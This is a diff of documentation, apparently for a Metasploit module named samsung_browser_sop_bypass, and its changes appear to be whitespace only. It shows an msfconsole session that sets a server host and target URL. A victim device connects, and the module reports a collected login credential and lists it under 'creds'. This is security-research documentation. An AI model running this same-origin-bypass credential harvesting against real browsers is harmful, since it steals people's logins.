@@ -15,8 +15,8 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
15
15
16
16
## Scenarios
17
17
```
18
- $ sudo msfconsole -q
19
- msf > use auxiliary/gather/samsung_browser_sop_bypass
18
+ $ sudo msfconsole -q
19
+ msf > use auxiliary/gather/samsung_browser_sop_bypass
20
20
msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104
21
21
SRVHOST => 192.168.1.104
22
22
msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090
@@ -27,7 +27,7 @@ msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.co
27
27
TARGET_URL => https://www.google.com/csi
28
28
msf auxiliary(samsung_browser_sop_bypass) > run
29
29
[*] Auxiliary module execution completed
30
- msf auxiliary(samsung_browser_sop_bypass) >
30
+ msf auxiliary(samsung_browser_sop_bypass) >
31
31
[*] Using URL: http://192.168.1.104:9090/
32
32
[*] Server started.
33
33
[*] 192.168.1.101: Request 'GET /'
@@ -38,19 +38,19 @@ msf auxiliary(samsung_browser_sop_bypass) >
38
38
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
39
39
[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword
40
40
41
- msf auxiliary(samsung_browser_sop_bypass) > creds
41
+ msf auxiliary(samsung_browser_sop_bypass) > creds
42
42
Credentials
43
43
===========
44
44
45
45
host origin service public private realm private_type
46
46
---- ------ ------- ------ ------- ----- ------------
47
47
emailID MyStrongPassword https://www.google.com/csi Password
48
48
49
- msf auxiliary(samsung_browser_sop_bypass) >
49
+ msf auxiliary(samsung_browser_sop_bypass) >
50
50
```
51
51
52
52
## Demos
53
53
54
- Working of MSF Module: ` https://youtu.be/ulU98cWVhoI `
54
+ Working of MSF Module: ` https://youtu.be/ulU98cWVhoI `
55
55
56
56
Vulnerable Browser: ` https://youtu.be/lpkbogxJXnw `
0 commit comments